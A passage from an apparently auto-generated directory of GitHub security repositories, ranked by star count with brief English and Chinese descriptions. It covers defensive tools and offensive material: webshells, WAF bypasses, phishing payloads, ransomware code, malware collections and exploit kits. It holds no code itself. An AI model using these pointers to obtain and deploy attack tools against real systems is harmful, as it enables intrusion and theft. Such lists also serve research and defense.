[**185**星][3m] [Py] [naategh/pyck](https://github.com/naategh/pyck) A collection of useful Python hacking scripts for beginners - [**184**星][15d] [enovella/tee-reversing](https://github.com/enovella/tee-reversing) A curated list of public TEE resources for learning how to reverse-engineer and achieve trusted code execution on ARM devices - [**184**星][14d] [fkie-cad/awesome-embedded-and-iot-security](https://github.com/fkie-cad/awesome-embedded-and-iot-security) A curated list of awesome embedded and IoT security resources. - [**184**星][3y] [Py] [wavestone-cdt/hadoop-attack-library](https://github.com/wavestone-cdt/hadoop-attack-library) A collection of pentest tools and resources targeting Hadoop environments - [**183**星][4m] [radareorg/r2con](https://github.com/radareorg/r2con) Radare Congress Stuff - [**182**星][10m] [Py] [hasecuritysolutions/logstash](https://github.com/hasecuritysolutions/logstash) Contains Logstash related content including tons of Logstash configurations - [**182**星][3m] [mre/awesome-dynamic-analysis](https://github.com/mre/awesome-dynamic-analysis) A curated list of dynamic analysis tools for various programming languages - [**181**星][2y] [PHP] [lcatro/php-webshell-bypass-waf](https://github.com/lcatro/php-webshell-bypass-waf) 分享PHP WebShell 绕过WAF 的一些经验 - [**180**星][8m] [pandazheng/threat-intelligence-analyst](https://github.com/pandazheng/threat-intelligence-analyst) 威胁情报,恶意样本分析,开源Malware代码收集 - [**179**星][2y] [CSS] [bhdresh/socialengineeringpayloads](https://github.com/bhdresh/socialengineeringpayloads) This is a collection of social engineering tricks and payloads being used for credential theft and spear phishing attacks. - [**177**星][2y] [Py] [duo-labs/idapython](https://github.com/duo-labs/idapython) Duo 实验室使用的IDAPython 脚本收集 - [cortex_m_firmware](https://github.com/duo-labs/idapython/blob/master/cortex_m_firmware.py) 整理包含ARM Cortex M微控制器固件的IDA Pro数据库 - [amnesia](https://github.com/duo-labs/idapython/blob/master/amnesia.py) 使用字节级启发式在IDA Pro数据库中的未定义字节中查找ARM Thumb指令 - [REobjc](https://github.com/duo-labs/idapython/blob/master/reobjc.py) 在Objective-C的调用函数和被调用函数之间进行适当的交叉引用 - [**176**星][7y] [Py] [gdssecurity/gwt-penetration-testing-toolset](https://github.com/gdssecurity/gwt-penetration-testing-toolset) 辅助渗透测试GWT程序的3个工具 - [**175**星][9m] [guardrailsio/awesome-java-security](https://github.com/guardrailsio/awesome-java-security) Awesome Java Security Resources - [**175**星][18d] [winmin/awesome-vm-exploit](https://github.com/winmin/awesome-vm-exploit) share some useful archives about vm and qemu escape exploit. - [**174**星][2m] [chbrian/awesome-adversarial-examples-dl](https://github.com/chbrian/awesome-adversarial-examples-dl) A curated list of awesome resources for adversarial examples in deep learning - [**170**星][10m] [thehackingsage/hackdroid](https://github.com/thehackingsage/hackdroid) Penetration Testing Apps for Android - [**169**星][3y] [Py] [northernsec/cve-scan](https://github.com/northernsec/cve-scan) Scan systems with NMap and parse the output to a list of CVE's, CWE's and DPE's - [**168**星][12m] [Py] [mnkgrover08-zz/whatsapp_automation](https://github.com/mnkgrover08-zz/whatsapp_automation) Whatsapp Automation is a collection of APIs that interact with WhatsApp messenger running in an Android emulator, allowing developers to build projects that automate sending and receiving messages, adding new contacts and broadcasting messages multiple contacts. - [**168**星][2y] [Py] [monrocoury/forensic-tools](https://github.com/monrocoury/forensic-tools) A collection of tools for forensic analysis - [**167**星][1m] [Py] [botherder/targetedthreats](https://github.com/botherder/targetedthreats) Collection of IOCs related to targeting of civil society - [**167**星][2y] [C++] [mortenschenk/bhusa2017](https://github.com/mortenschenk/bhusa2017) Content from presentation at BHUSA 2017 - [**166**星][7m] [Ruby] [r00t-3xp10it/msf-auxiliarys](https://github.com/r00t-3xp10it/msf-auxiliarys) My collection of metasploit auxiliary post-modules - [**164**星][3m] [mdrights/digital-rights](https://github.com/mdrights/digital-rights) 抵抗国家机器对公民的监控 - [**163**星][3y] [Py] [ctfs/write-ups-tools](https://github.com/ctfs/write-ups-tools) A collection of tools used to maintain and create CTF write-up folders - [**163**星][2y] [secwiki/hack-movie](https://github.com/secwiki/hack-movie) 黑客相关的电视剧/电影/纪录片 - [**161**星][2y] [javierolmedo/shodan-filters](https://github.com/javierolmedo/shodan-filters) A list of shodan filters - [**161**星][1y] [splunk/botsv1](https://github.com/splunk/botsv1) A sample security dataset and CTF platform - [**161**星][7m] [C#] [xorrior/random-csharptools](https://github.com/xorrior/random-csharptools) Collection of CSharp Assemblies focused on Post-Exploitation Capabilities - [**160**星][1y] [HTML] [exploitprotocol/mobile-security-wiki](https://github.com/exploitprotocol/mobile-security-wiki) - [**159**星][1y] [joychou93/sks](https://github.com/joychou93/sks) Security Knowledge Structure(安全知识汇总) - [**159**星][3y] [Py] [nneonneo/eqgrp-free-file](https://github.com/nneonneo/eqgrp-free-file) Free sampling of files from the purported Equation Group hack. - [**159**星][6m] [samanl33t/awesome-mainframe-hacking](https://github.com/samanl33t/awesome-mainframe-hacking) List of Awesome Mainframe Hacking/Pentesting Resources - [**158**星][4m] [HTML] [zer0yu/berserker](https://github.com/zer0yu/berserker) A list of useful payloads for Web Application Security and Pentest/CTF - [**157**星][9m] [dckc/awesome-ocap](https://github.com/dckc/awesome-ocap) Awesome Object Capabilities andCapability-based Security - [**156**星][1y] [YARA] [mikesxrs/open-source-yara-rules](https://github.com/mikesxrs/open-source-yara-rules) YARA Rules I come across on the internet - [**156**星][2y] [PS] [psconfeu/2018](https://github.com/psconfeu/2018) PowerShell Conference Europe 2018 Slides and Demo Scripts - [**156**星][2y] [ASP] [testsecer/webshell](https://github.com/testsecer/webshell) 这是一个WebShell收集项目 - [**154**星][3y] [zbetcheckin/pdf_analysis](https://github.com/zbetcheckin/pdf_analysis) Several PDF analysis reassembled with additional tips and tools - [**151**星][1y] [chryzsh/awesome-windows-security](https://github.com/chryzsh/awesome-windows-security) List of Awesome Windows Security Resources - [**151**星][3y] [C] [pustladi/windows-2000](https://github.com/pustladi/windows-2000) Windows 2000专业版的源码 - [**151**星][7m] [shramos/awesome-cybersecurity-datasets](https://github.com/shramos/awesome-cybersecurity-datasets) A curated list of amazingly awesome Cybersecurity datasets - [**150**星][1y] [brucetg/app_security](https://github.com/brucetg/app_security) - [**150**星][2y] [dragonquesthero/awesome-windows-security-development](https://github.com/dragonquesthero/awesome-windows-security-development) awesome-windows-security-development - [**150**星][2m] [leonjza/awesome-nmap-grep](https://github.com/leonjza/awesome-nmap-grep) Awesome Nmap Grep - [**150**星][2y] [Py] [malwaretech/trickbot-toolkit](https://github.com/malwaretech/trickbot-toolkit) A collection of tools for dealing with TrickBot - [**149**星][6y] [C++] [kaiserfarrell/malware](https://github.com/kaiserfarrell/malware) virus collection source code - [**148**星][11m] [Shell] [aturl/awesome-anti-gfw](https://github.com/aturl/awesome-anti-gfw) 突破网络审查和封锁的开源工具清单。 - [**148**星][7m] [Shell] [petermosmans/security-scripts](https://github.com/petermosmans/security-scripts) A collection of security related Python and Bash shell scripts. Analyze hosts on generic security vulnerabilities. Wrapper around popular tools like nmap (portscanner), nikto (webscanner) and testssl.sh (SSL/TLS scanner) - [**147**星][14d] [Shell] [recolic/awesome-hust](https://github.com/recolic/awesome-hust) HUST experiments, reports, and useful tools. - [**147**星][1m] [security-cheatsheet/reverse-shell-cheatsheet](https://github.com/security-cheatsheet/reverse-shell-cheatsheet) - [**146**星][2m] [bin2415/fuzzing_paper](https://github.com/bin2415/fuzzing_paper) puzzing related paper - [**145**星][2y] [chan9390/awesome-mitm](https://github.com/chan9390/awesome-mitm) Curated List of MitM frameworks on GitHub - [**145**星][3m] [Py] [ripe-atlas-community/ripe-atlas-community-contrib](https://github.com/ripe-atlas-community/ripe-atlas-community-contrib) Repository for links towards tools written during hackathons, and a collection of contributions by the community of the RIPE Atlas visualizations, tools for analysing measurements data and other scripts - [**145**星][3y] [PHP] [webshellpub/awsome-webshell](https://github.com/webshellpub/awsome-webshell) webshell样本大合集。收集各种webshell用于webshell分析与发现 - [**144**星][10m] [Py] [kacperszurek/exploits](https://github.com/kacperszurek/exploits) 提权漏洞利用集合 - [**142**星][3y] [C] [mdsecresearch/publications](https://github.com/mdsecresearch/publications) A list of published research documents - [**142**星][3y] [kejane/securityrss](https://github.com/kejane/SecurityRSS) 网络安全相关的RSS订阅列表 - [**141**星][6m] [C++] [oatpp/oatpp-examples](https://github.com/oatpp/oatpp-examples) List of example projects of how to use oat++ framework - [**140**星][1y] [laxa/hackingtools](https://github.com/laxa/hackingtools) Exhaustive list of hacking tools - [**140**星][8y] [stefanesser/ida-ios-toolkit](https://github.com/stefanesser/ida-ios-toolkit) 辅助处理iOS kernelcache的IDAPython收集 - [**139**星][29d] [pomerium/awesome-security-audits](https://github.com/pomerium/awesome-security-audits) A collection of public security audits. - [**138**星][2y] [Py] [duoergun0729/3book](https://github.com/duoergun0729/3book) 《Web安全之强化学习与GAN》 - [**137**星][11d] [Py] [omegak2/pypoe](https://github.com/omegak2/pypoe) Collection of Python Tools for Path of Exile - [**136**星][8m] [gaerae/awesome-algorithms-education](https://github.com/gaerae/awesome-algorithms-education) A curated list to learning and practicing about algorithm. - [**136**星][3y] [kurobeats/pentest-bookmarks](https://github.com/kurobeats/pentest-bookmarks) Open Penetration Testing Bookmarks Collection - [**136**星][2m] [Py] [wudimahua/firewall](https://github.com/wudimahua/firewall) 美国国家安全局NSA下属方程式黑客组织(Equation Group)被The Shadow Brokers(影子经纪人)hack出来的并免费分享的源码 - [**135**星][6m] [Makefile] [cirosantilli/arm-assembly-cheat](https://github.com/cirosantilli/arm-assembly-cheat) MOVED TO: - [**135**星][11m] [PS] [securemode/invoke-apex](https://github.com/securemode/invoke-apex) A PowerShell-based toolkit and framework consisting of a collection of techniques and tradecraft for use in red team, post-exploitation, adversary simulation, or other offensive security tasks. - [**135**星][2y] [thec00n/smart-contract-honeypots](https://github.com/thec00n/smart-contract-honeypots) 智能合约蜜罐收集 - [**135**星][1y] [Shell] [onmyway133/swiftsnippets](https://github.com/onmyway133/SwiftSnippets) A collection of Swift snippets to be used in Xcode - [**134**星][3y] [aqzt/sso](https://github.com/aqzt/sso) 项目主要是汇集整理服务器安全运维规范,包括运维工程师必须遵守的规范、服务器运维中注意事项、故障避免手段等文档,帮助运维工程师避免服务器安全和运维故障,方便运维工程师学习成长。 - [**133**星][3y] [C++] [chenenyu/androidsecurity](https://github.com/chenenyu/androidsecurity) Android安全实践 - [**133**星][2m] [jlopp/physical-bitcoin-attacks](https://github.com/jlopp/physical-bitcoin-attacks) A list of known attacks against Bitcoin / crypto asset owning entities that occurred in meatspace. - [**133**星][10d] [Shell] [adroitadorkhan/energizedprotection](https://github.com/AdroitAdorKhan/EnergizedProtection) A merged collection of hosts from reputable sources. #StayEnergized! - [**132**星][2y] [C#] [m0xiaoxi/ctftools](https://github.com/m0xiaoxi/ctftools) 本项目主要搜集一些关于信息安全攻防相关的知识与工具,便于个人的渗透工作。 - [**131**星][2y] [HTML] [chybeta/waf-bypass](https://github.com/chybeta/waf-bypass) WAF Bypass Cheatsheet - [**131**星][10m] [HTML] [minhaskamal/cuteviruscollection](https://github.com/minhaskamal/cuteviruscollection) A Collection of Cute But Deadly Viruses (small-unharmful-annoying-harmless-funny-malware-virus-worm-windows-xp-7-10) - [**131**星][11m] [C] [regehr/ub-canaries](https://github.com/regehr/ub-canaries) collection of C/C++ programs that try to get compilers to exploit undefined behavior - [**130**星][30d] [inquest/yara-rules](https://github.com/inquest/yara-rules) A collection of YARA rules we wish to share with the world, most probably referenced from - [**130**星][1y] [PS] [xor-function/fathomless](https://github.com/xor-function/fathomless) A collection of post-exploitation tools for network red teaming. (Migrating to Fathomless Project) - [**128**星][2y] [mawenjian/china-cdn-domain-whitelist](https://github.com/mawenjian/china-cdn-domain-whitelist) 中国CDN服务提供商域名白名单(China CDN Service Providers' Domain Whitelist) - [**127**星][10m] [whid-injector/awesome-go-offensive-tools](https://github.com/whid-injector/awesome-go-offensive-tools) List of Awesome Offensive Tools written in GO - [**126**星][3m] [HTML] [sundaysec/android-exploits](https://github.com/sundaysec/android-exploits) A collection of android Exploits and Hacks - [**123**星][2m] [HTML] [edoverflow/proof-of-concepts](https://github.com/edoverflow/proof-of-concepts) A little collection of fun and creative proof of concepts to demonstrate the potential impact of a security vulnerability. - [**123**星][2y] [we5ter/awesome-platforms](https://github.com/we5ter/awesome-platforms) A curated list of awesome security platforms,including CTF/Security Response Center/Bug Tracker and so on. - [**123**星][2y] [Shell] [averagesecurityguy/cheat-sheets](https://github.com/averagesecurityguy/cheat-sheets) Various Cheat Sheets related to development and security - [**122**星][1y] [nagwww/s3-leaks](https://github.com/nagwww/s3-leaks) List of S3 Hacks - [**121**星][1y] [PHP] [a0xnirudh/kurukshetra](https://github.com/a0xnirudh/kurukshetra) 通过交互式解决问题的方式来学习安全编程 - [**121**星][4y] [Py] [fengxuangit/dede_exp_collect](https://github.com/fengxuangit/dede_exp_collect) collection dedecms exp use pocsuite framework 收集织梦的一些漏洞,并用pocsuite框架写出利用程序。打造一键日dede - [**121**星][16d] [HTML] [mozillasecurity/fuzzmanager](https://github.com/mozillasecurity/fuzzmanager) A fuzzing management tools collection - [**121**星][4y] [sandysekharan/ctf-tool](https://github.com/sandysekharan/ctf-tool) A curated list of Capture The Flag (CTF) frameworks, libraries, resources and softwares. - [**120**星][10m] [byt3bl33d3r/ansibleplaybooks](https://github.com/byt3bl33d3r/ansibleplaybooks) A collection of Ansible Playbooks that configure Kali to use Fish & install a number of tools - [**118**星][7m] [fabionoth/awesome-cyber-security](https://github.com/fabionoth/awesome-cyber-security) A collection of awesome software, libraries, documents, books, resources and cools stuffs about security. - [**118**星][1y] [lua] [tanjiti/icstools](https://github.com/tanjiti/icstools) ics security tools - [**117**星][9m] [marcosvalle/awesome-windows-red-team](https://github.com/marcosvalle/awesome-windows-red-team) A curated list of awesome Windows frameworks, libraries, software and resources for Red Teams - [**117**星][4m] [PS] [thom-s/netsec-ps-scripts](https://github.com/thom-s/netsec-ps-scripts) Collection of PowerShell network security scripts for system administrators. - [**116**星][2m] [govanguard/list-pentest-tools](https://github.com/govanguard/list-pentest-tools) A curated list of network penetration testing tools. - [**111**星][1m] [firmianay/security-paper](https://github.com/firmianay/security-paper) (与本人兴趣强相关的)各种安全or计算机资料收集 - [**110**星][3m] [C++] [x64dbg/scripts](https://github.com/x64dbg/scripts) A collection of x64dbg scripts. Feel free to submit a pull request to add your script. - [**108**星][8m] [binject/awesome-go-security](https://github.com/binject/awesome-go-security) A dedicated place for cool golang security projects - [**108**星][2y] [Ruby] [porterhau5/bloodhound-owned](https://github.com/porterhau5/bloodhound-owned) A collection of files for adding and leveraging custom properties in BloodHound. - [**107**星][3m] [ajvb/awesome-tor](https://github.com/ajvb/awesome-tor) A list of awesome Tor related projects, articles, papers, etc - [**105**星][4m] [Py] [ex16x41/oscp-prep](https://github.com/ex16x41/oscp-prep) my oscp prep collection - [**105**星][2y] [gossithedog/threathunting](https://github.com/gossithedog/threathunting) Tools for hunting for threats. - [**105**星][4m] [soffensive/windowsblindread](https://github.com/soffensive/windowsblindread) A list of files / paths to probe when arbitrary files can be read on a Microsoft Windows operating system - [**104**星][3y] [Py] [landgrey/taoman](https://github.com/landgrey/taoman) 快速收集 - [**103**星][3y] [C++] [azuregreen/injectcollection](https://github.com/azuregreen/injectcollection) A collection of injection via vc++ in ring3 - [**102**星][8m] [fox-it/cobaltstrike-extraneous-space](https://github.com/fox-it/cobaltstrike-extraneous-space) Historical list of {Cobalt Strike,NanoHTTPD} servers - [**102**星][13d] [houjingyi233/cpu-vulnerability-collections](https://github.com/houjingyi233/CPU-vulnerability-collections) - [**102**星][3m] [ashemery/linuxforensics](https://github.com/ashemery/LinuxForensics) Everything related to Linux Forensics - [**102**星][13d] [chryzsh/awesome-bloodhound](https://github.com/chryzsh/awesome-bloodhound) A curated list of awesome BloodhoundAD resources - [**101**星][2m] [jonaschn/awesome-he](https://github.com/jonaschn/awesome-he) A curated list of amazing Homomorphic Encryption libraries, software and resources - [**101**星][4m] [xx0hcd/malleable-c2-profiles](https://github.com/xx0hcd/malleable-c2-profiles) Cobalt Strike - Malleable C2 Profiles. A collection of profiles used in different projects using Cobalt Strike - [**100**星][5y] [Py] [blasty/moneyshot](https://github.com/blasty/moneyshot) A collection of python scripts to aid you in the final steps of binary exploitation or during the construction of buffers. - [**100**星][17d] [Ruby] [hahwul/mad-metasploit](https://github.com/hahwul/mad-metasploit) Metasploit custom modules, plugins, resource script and.. awesome metasploit collection - [**99**星][19d] [TeX] [misp/misp-training](https://github.com/misp/misp-training) MISP trainings, threat intel and information sharing training materials with source code - [**99**星][10y] [C] [tecknicaltom/dsniff](https://github.com/tecknicaltom/dsniff) dsniff is a collection of tools for network auditing and penetration testing. - [**99**星][2y] [PS] [testingpens/malwarepersistencescripts](https://github.com/testingpens/malwarepersistencescripts) A collection of scripts I've written to help red and blue teams with malware persistence techniques. - [**98**星][3m] [byt3bl33d3r/slides](https://github.com/byt3bl33d3r/slides) Slides from various talks that I've given over the years - [**98**星][2y] [Py] [leesoh/yams](https://github.com/leesoh/yams) A collectionof Ansible roles for automating infosec builds. - [**97**星][2y] [Shell] [chorankates/h4ck](https://github.com/chorankates/h4ck) a collection of writeups and tools related to ~embedded device ~hacking - [**97**星][1y] [Py] [njcx/pocsuite_poc_collect](https://github.com/njcx/pocsuite_poc_collect) 收集一些 poc with pocsuite框架 - [**97**星][3y] [C] [s4n7h0/practical-reverse-engineering-using-radare2](https://github.com/s4n7h0/practical-reverse-engineering-using-radare2) Training Materials of Practical Reverse Engineering using Radare2 - [**97**星][4y] [Java] [zencodex/hack-android](https://github.com/zencodex/hack-android) Collection tools for hack android, java - [**96**星][3m] [geeksonsecurity/vuln-web-apps](https://github.com/geeksonsecurity/vuln-web-apps) A curated list of vulnerable web applications. - [**96**星][2y] [Java] [jgillam/burp-co2](https://github.com/jgillam/burp-co2) A collection of enhancements for Portswigger's popular Burp Suite web penetration testing tool. - [**95**星][2y] [C] [cetfor/antidbg](https://github.com/cetfor/antidbg) A bunch of Windows anti-debugging tricks. - [**95**星][3m] [PHP] [commixproject/commix-testbed](https://github.com/commixproject/commix-testbed) A collection of web pages, vulnerable to command injection flaws. - [**95**星][5y] [Py] [nihilus/ida-idc-scripts](https://github.com/nihilus/ida-idc-scripts) 多个IDC脚本收集 - [**94**星][14d] [Py] [alanvivona/pwnshop](https://github.com/alanvivona/pwnshop) Exploit Development and Reverse Engineering topics - [**94**星][10d] [Py] [endermanch/malwaredatabase](https://github.com/endermanch/malwaredatabase) This repository is one of a few malware collections on the GitHub. - [**94**星][2y] [ObjC] [r0ysue/osg-teams](https://github.com/r0ysue/osg-teams) 希望大家在合作中学习姿势、提升技术、交流感情。比赛第二,友谊第一。 - [**93**星][5y] [Py] [debasishm89/hack_audio_captcha](https://github.com/debasishm89/hack_audio_captcha) Collection of Scripts written to Solve/Crack Audio reCapcha Challenges - [**93**星][4y] [Py] [groundworkstech/pybfd](https://github.com/groundworkstech/pybfd) A Python interface to the GNU Binary File Descriptor (BFD) library. - [**93**星][23d] [Py] [log2timeline/dftimewolf](https://github.com/log2timeline/dftimewolf) A framework for orchestrating forensic collection, processing and data export - [**92**星][2m] [PS] [dbheise/vm_setup](https://github.com/dbheise/vm_setup) A collection of scripts to initialize a windows VM to run all the malwares! - [**92**星][1y] [PS] [rasta-mouse/aggressor-script](https://github.com/rasta-mouse/aggressor-script) Collection of Aggressor Scripts for Cobalt Strike - [**92**星][2y] [PS] [sadprocessor/empiredog](https://github.com/sadprocessor/empiredog) A collection of PowerShell Modules for BloodHound/Empire Orchestration - [**92**星][2y] [C] [secwiki/android-kernel-exploits](https://github.com/secwiki/android-kernel-exploits) android kernel exploits漏洞集合 - [**91**星][1y] [001spartan/aggressor_scripts](https://github.com/001spartan/aggressor_scripts) A collection of useful scripts for Cobalt Strike - [**91**星][2y] [grrrdog/tls-redirection](https://github.com/grrrdog/tls-redirection) raise awareness of a little-known group of attacks, TLS redirection / Virtual Host Confusion, and to bring all the information related to this topic together. - [**91**星][6m] [C++] [niklasb/sploits](https://github.com/niklasb/sploits) - [**91**星][2y] [PS] [russelltomkins/active-directory](https://github.com/russelltomkins/active-directory) Collection of scripts for Querying and Managing Active Directory and Domain Controllers - [**90**星][10m] [pandazheng/securitysite](https://github.com/pandazheng/securitysite) 收集了一些安全公司的博客 - [**90**星][3m] [Py] [radareorg/r2con2019](https://github.com/radareorg/r2con2019) slides and materials - [**90**星][1m] [payloadbox/sql-injection-payload-list](https://github.com/payloadbox/sql-injection-payload-list) SQL Injection Payload List - [**89**星][8m] [Shell] [hannob/tlshelpers](https://github.com/hannob/tlshelpers) A collection of shell scripts that help handling X.509 certificate and TLS issues - [**89**星][12m] [paralax/awesome-internet-scanning](https://github.com/paralax/awesome-internet-scanning) A curated list of awesome Internet port and host scanners, plus related components and much more, with a focus on free and open source projects. - [**89**星][19d] [C++] [sinakarvandi/process-magics](https://github.com/sinakarvandi/process-magics) This is a collection of interesting codes about Windows Process creation. - [**88**星][19d] [claucece/useful-crypto-resources](https://github.com/claucece/useful-crypto-resources) A place for useful crypto-related resources plus some of my fav stuff - [**88**星][4y] [dantaler/detectionstring](https://github.com/dantaler/detectionstring) list of sql-injection and XSS strings - [**88**星][6m] [v-p-b/avpwn](https://github.com/v-p-b/avpwn) List of real-world threats against endpoint protection software - [**88**星][1y] [TeX] [zxgio/r2-cheatsheet](https://github.com/zxgio/r2-cheatsheet) Radare2 cheat-sheet - [**87**星][9m] [Py] [laconicwolf/burp-extensions](https://github.com/laconicwolf/burp-extensions) A collection of scripts to extend Burp Suite - [**86**星][3y] [aidanharris/free-security-ebooks-from-packtpub](https://github.com/aidanharris/free-security-ebooks-from-packtpub) Collection of free Security eBooks from Packt Publishing [Regularly Updated] - [**86**星][5m] [chrisdiana/awesome-odroid-go](https://github.com/chrisdiana/awesome-odroid-go) A collection of awesome ODROID-GO emulators, games and resources - [**86**星][9m] [nongiach/awesome-cryptocurrency-security](https://github.com/nongiach/awesome-cryptocurrency-security) Awesome cryptocurrency security - [**86**星][1y] [HTML] [radareorg/r2con2018](https://github.com/radareorg/r2con2018) - [**85**星][10d] [caledoniaproject/awesome-opensource-security](https://github.com/caledoniaproject/awesome-opensource-security) A list of interesting stuffs that I have no time to test/review - [**85**星][1y] [ckjbug/kali-linux-learning](https://github.com/ckjbug/kali-linux-learning) - [**85**星][2y] [palmercluff/qemu-images](https://github.com/palmercluff/qemu-images) A collection of disk images and virtual machines that can be used by the QEMU emulator - [**85**星][1y] [santosomar/who_and_what_to_follow](https://github.com/santosomar/who_and_what_to_follow) Who and what to follow in the world of cyber security - [**83**星][9m] [kai5263499/awesome-container-security](https://github.com/kai5263499/awesome-container-security) Awesome list of resources related to container security - [**83**星][2y] [Py] [am0nsec/exploit](https://github.com/am0nsec/exploit) Collection of different exploits - [**83**星][17d] [allsafecybersecurity/awesome-ghidra](https://github.com/allsafecybersecurity/awesome-ghidra) A curated list of awesome Ghidra materials - [**82**星][4m] [blockchainlabsnz/awesome-solidity](https://github.com/blockchainlabsnz/awesome-solidity) A curated list of awesome Solidity resources - [**82**星][9m] [Py] [ciscodevnet/virlutils](https://github.com/ciscodevnet/virlutils) - [**82**星][11m] [sderosiaux/guidelines-to-create-a-strong-website](https://github.com/sderosiaux/guidelines-to-create-a-strong-website) A list of all things to consider when making a website or webapp of quality. - [**82**星][14d] [yingtongdou/graph-adversarial-learning-literature](https://github.com/yingtongdou/graph-adversarial-learning-literature) A curated list of adversarial attacks and defenses papers on graph-structured data. - [**82**星][21d] [alphaseclab/sec-tool-list](https://github.com/alphaseclab/sec-tool-list) Almost 18K security related open source tools, sorted by star count. Both in markdown and json format. - [**81**星][4y] [fabiobaroni/awesome-chinese-infosec-websites](https://github.com/fabiobaroni/awesome-chinese-infosec-websites) A curated list of Chinese websites and personal blogs about ethical hacking and pentesting - [**81**星][3y] [Py] [januzellij/hopperscripts](https://github.com/januzellij/hopperscripts) Collection of scripts I use in the Hopper disassembler - [**81**星][1m] [ObjC] [poomsmart/idaobjctypes](https://github.com/poomsmart/idaobjctypes) A collection of types & functions definitions useful for Objective-C binaries analysis. - [**79**星][2y] [iamhdt/ecommerce-website-security-checklist](https://github.com/iamhdt/ecommerce-website-security-checklist) List of considerations for commerce site auditing and security teams. This is summary of action points and areas that need to be built into the Techinical Specific Document, or will be checked in the Security testing phases. - [**79**星][2y] [Py] [imiyoo2010/teye_scanner_for_book](https://github.com/imiyoo2010/teye_scanner_for_book) 《白帽子讲Web扫描》书籍参考代码 - [**79**星][3y] [yeyintminthuhtut/awesome-study-resources-for-kernel-hacking](https://github.com/yeyintminthuhtut/awesome-study-resources-for-kernel-hacking) Kernel Hacking study materials collection - [**78**星][6y] [CSS] [gajus/bugger](https://github.com/gajus/bugger) Bugger is a collection of functions for debugging PHP code. - [**78**星][3y] [HTML] [malqr/malqr.github.io](https://github.com/malqr/malqr.github.io) MalQR is a collection of malicious QR Codes and Barcodes you can use to test the security of your scanners. - [**78**星][3y] [Py] [securitystreak/security-scripts](https://github.com/securitystreak/security-scripts) A collection of public offensive and defensive security related scripts for InfoSec students. - [**77**星][4y] [HTML] [f47h3r/hackingteam_exploits](https://github.com/f47h3r/hackingteam_exploits) Initial Collection of HackingTeam Exploits - [**76**星][4y] [hardhatdigital/rails-security-audit](https://github.com/hardhatdigital/rails-security-audit) A checklist of Rails security audit - [**76**星][4m] [ivbeg/awesome-forensicstools](https://github.com/ivbeg/awesome-forensicstools) Awesome list of digital forensic tools - [**76**星][10m] [misterch0c/crimeboards](https://github.com/misterch0c/crimeboards) A list of private and public (more or less) blackhat boards - [**76**星][4m] [ivbeg/awesome-forensicstools](https://github.com/ivbeg/awesome-forensicstools) Awesome list of digital forensic tools - [**75**星][2y] [HTML] [cyberheartmi9/payloadsallthethings](https://github.com/cyberheartmi9/payloadsallthethings) - [**75**星][9m] [edelahozuah/awesome-wifi-security](https://github.com/edelahozuah/awesome-wifi-security) A collection of awesome resources related to 802.11 security, tools and other things - [**75**星][4m] [gouveaheitor/awesome-biohacking](https://github.com/gouveaheitor/awesome-biohacking) a awesome collection about Biohacking. - [**75**星][3m] [C++] [shellvm/shellvm](https://github.com/shellvm/shellvm) A collection of LLVM transform and analysis passes to write shellcode in regular C - [**75**星][1y] [tianjifou/ios-security-attack-and-prevent](https://github.com/tianjifou/ios-security-attack-and-prevent) iOS安全攻与防,详细的列出了,在iOS开发中,项目会存在的安全漏洞以及解决办法。 - [**74**星][6m] [HTML] [ph0en1x-xmu/awesome-ctf-book](https://github.com/Ph0en1x-XMU/Awesome-CTF-Book) Study CTF, study security - [**74**星][3y] [wtsxdev/android-security-list](https://github.com/wtsxdev/android-security-list) Collection of Android security related resources - [**73**星][3y] [lcatro/hacker_document](https://github.com/lcatro/hacker_document) 收集一些以前看过对于入门和进阶很有用的攻击原理文档.. - [**73**星][3y] [Py] [programa-stic/hexag00n](https://github.com/programa-stic/hexag00n) Hexag00n: A collection of reverse engineering tools for the Qualcomm Digital Signal Proccesor (QDSP6) - [**72**星][5y] [C#] [khr0x40sh/whitelistevasion](https://github.com/khr0x40sh/whitelistevasion) Collection of scripts, binaries and the like to aid in WhiteList Evasion on a Microsoft Windows Network. - [**72**星][3y] [Py] [roothaxor/ransom](https://github.com/roothaxor/ransom) Various codes related to Ransomware Developement - [**72**星][9m] [wufengxue/android-reverse](https://github.com/wufengxue/android-reverse) 安卓逆向工具汇总 - [**72**星][2y] [zntfdr/awesome-twitter-bots](https://github.com/zntfdr/awesome-twitter-bots) A Curated Collection of the Best Twitter Bots - [**71**星][8y] [Py] [hellais/buckle-up](https://github.com/hellais/buckle-up) Script for running Mac OS X applications in a sandbox and a collection of seatbelt profiles - [**70**星][5m] [ascotbe/osmographic-brain-mapping](https://github.com/ascotbe/osmographic-brain-mapping) 渗透脑图(渗透步骤) - [**70**星][2y] [hacker0x01/h1-212-ctf-solutions](https://github.com/hacker0x01/h1-212-ctf-solutions) A collection of the solutions people wrote for the H1-212 Capture The Flag event - [**70**星][3y] [Ruby] [melvinsh/subresolve](https://github.com/melvinsh/subresolve) Resolve and quickly portscan a list of (sub)domains. - [**70**星][4y] [C++] [nccgroup/windowsdaclenumproject](https://github.com/nccgroup/windowsdaclenumproject) A collection of tools to enumerate and analyse Windows DACLs - [**70**星][3y] [HTML] [skylined/bugs](https://github.com/skylined/bugs) Collection of software bugs found by SkyLined - [**70**星][7m] [C++] [thomasthelen/antidebugging](https://github.com/thomasthelen/antidebugging) A collection of c++ programs that demonstrate common ways to detect the presence of an attached debugger. - [**70**星][4y] [C++] [waleedassar/antidebug](https://github.com/waleedassar/antidebug) Collection Of Anti-Debugging Tricks - [**70**星][6m] [wbierbower/awesome-physics](https://github.com/wbierbower/awesome-physics) A collaborative list of awesome software for exploring Physics concepts - [**70**星][16d] [Shell] [sclorg/s2i-php-container](https://github.com/sclorg/s2i-php-container) PHP container images based on Red Hat Software Collections and intended for OpenShift and general usage, that provide a platform for building and running PHP applications. Users can choose between Red Hat Enterprise Linux, Fedora, and CentOS based images. - [**70**星][3m] [opentoallctf/tips](https://github.com/opentoallctf/tips) - [**69**星][3m] [C] [aerosoul94/ida_gel](https://github.com/aerosoul94/ida_gel) A collection of IDA loaders for various game console ELF's. (PS3, PSVita, WiiU) - [**67**星][11d] [TSQL] [mitchellkrogza/the-big-list-of-hacked-malware-web-sites](https://github.com/mitchellkrogza/the-big-list-of-hacked-malware-web-sites) This repository contains a list of all web sites I come across that are either hacked with or purposefully hosting malware, ransomware, viruses or trojans. - [**67**星][2y] [shmilylty/awesome-malware-analysis](https://github.com/shmilylty/awesome-malware-analysis) A curated list of awesome malware analysis tools and resources - [**66**星][3y] [Py] [jgamblin/badactors](https://github.com/jgamblin/badactors) Create a list of bad actors from public IP blacklist. - 